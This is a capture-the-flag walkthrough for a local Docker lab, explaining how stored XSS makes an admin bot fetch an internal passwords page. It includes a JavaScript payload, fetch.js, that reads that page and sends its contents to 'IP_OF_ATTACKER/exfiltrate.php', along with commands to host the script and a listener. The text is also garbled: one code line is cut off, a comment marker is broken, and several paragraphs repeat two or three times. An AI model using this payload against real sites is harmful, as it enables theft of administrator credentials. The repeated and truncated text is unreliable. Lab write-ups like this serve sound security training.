Red50 Full Writeup

IP Address 172.25.200.200

Port: 9027

Want to run this Docker container locally?

docker run -d -p 9027:80 --name red50 --restart always joshbeck2024/ctf_xss_to_null_byte_injection_flag_red50

Start by registering an account and logging in.

You can see I have taken that step in the screenshot below

There is an admin user who will visit `messages.php` every 60 seconds. The concept is we want to inject a script that will force that user to visit `http://confidential.local/passwords.php` from the admin user’s position inside a private subnet and ship us the administrative password list.

There is more than one way to handle this. The method in this walkthrough can be streamlined!

Create a folder to work in and use `pico` to create a file called `fetch.js`

This file has 2 functions
- sendData() will make a request to the attacker machine on port 80 display any data carried as parameters.
- fetchPasswords() will force anyone executing this script to make a request to http://confidential.local/passwords.php and send the contents of the webpage that is returned to the sendData() function.

/ Function to send the fetched data to the attacker's server using GET parameters
function sendData(data) {
    var xhr = new XMLHttpRequest();
    var url = 'http://IP_OF_ATTACKER/exfiltrate.php?data=' + encodeURIComponent(data) + '&' + new Da>
    xhr.open('GET', url, true);
    xhr.send();
}

// Function to fetch passwords from passwords.php
function fetchPasswords() {
    var xhr = new XMLHttpRequest();
    xhr.open('GET', '<http://confidential.local/passwords.php>', true);  // Replace with the target URL
    xhr.onload = function() {
        if (xhr.status === 200) {
            console.log("Passwords fetched successfully: ", xhr.responseText);
            sendData(xhr.responseText);  // Send the fetched passwords to the attacker's server
        }
    };
    xhr.send();
}

// Automatically execute the exploit when the script is loaded
fetchPasswords();

Host this file using `python3 -m http.server`

In another window we’ll stand up a web server on port 80.

This webserver will be listening for any information sent from the sendData() method within fetch.js

python3 -m http.server 80

Want to run this Docker container locally?

Start by registering an account and logging in.

There is an admin user who will visit messages.php every 60 seconds. The concept is we want to inject a script that will force that user to visit http://confidential.local/passwords.php from the admin user’s position inside a private subnet and ship us the administrative password list.

There is more than one way to handle this. The method in this walkthrough can be streamlined!

Create a folder to work in and use pico to create a file called fetch.js

Host this file using python3 -m http.server

In another window we’ll stand up a web server on port 80.

Now we’ll inject some XSS into the message box that will force anyone viewing messages to execute the code in fetch.js

There is an admin user who will visit `messages.php` every 60 seconds. The concept is we want to inject a script that will force that user to visit `http://confidential.local/passwords.php` from the admin user’s position inside a private subnet and ship us the administrative password list.

Create a folder to work in and use `pico` to create a file called `fetch.js`

Host this file using `python3 -m http.server`

Now we’ll inject some XSS into the message box that will force anyone viewing messages to execute the code in `fetch.js`